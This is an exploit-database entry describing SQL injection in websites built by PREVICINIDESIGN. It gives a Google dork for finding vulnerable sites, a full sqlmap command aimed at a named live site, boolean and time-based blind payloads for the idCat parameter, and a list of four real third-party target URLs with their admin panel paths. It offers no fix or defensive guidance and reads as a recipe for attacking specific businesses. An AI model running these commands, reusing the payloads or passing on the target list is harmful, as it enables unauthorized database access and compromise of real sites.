Credits Previcinidesign Sql Injection Vulnerability

2017.12.02
Credit: TrazeR
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################# # Exploit Title: CREDITS PREVICINIDESIGN Sql İnjection Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork : intext:"CREDITS PREVICINIDESIGN" & inurl:id= Or Web by PREVICINIDESIGN & php?id= # Tested on : Kali Linux 2017 Chrome, Firefox # Date : 2017-12-01 # Vendor Home: http://www.previcinidesign.com/ # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Open Target [+] Sqlmap And Manuel Command : root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only -u "http://www.onoya.it/it/menu.php?idCat=25" --no-cast --batch --dbs Parameter: idCat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: idCat=25 AND 3326=3326 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: idCat=25 AND SLEEP(5) Demo: http://www.onoya.it/it/menu.php?idCat=25 http://www.amarcordpiadineria.it/notizie-fresche.php?ID=15 http://www.osteopatiassociati.it/casi-scheda.php?ID=29 http://ibrubinetterie.com/eng/collezione-doccia-lista.php?ID=7 Manager: http://www.onoya.it/aps http://www.amarcordpiadineria.it/admin/ http://www.osteopatiassociati.it/admin/ http://ibrubinetterie.com/admin/ Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen Special Thanks TurkZ.org All Staff

References:

http://www.turkz.org/Forum/konu/credits-previcinidesign-sql-injection-vulnerability.3873/
http://www.trazer.org/2017/12/credits-previcinidesign-sql-injection.html


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top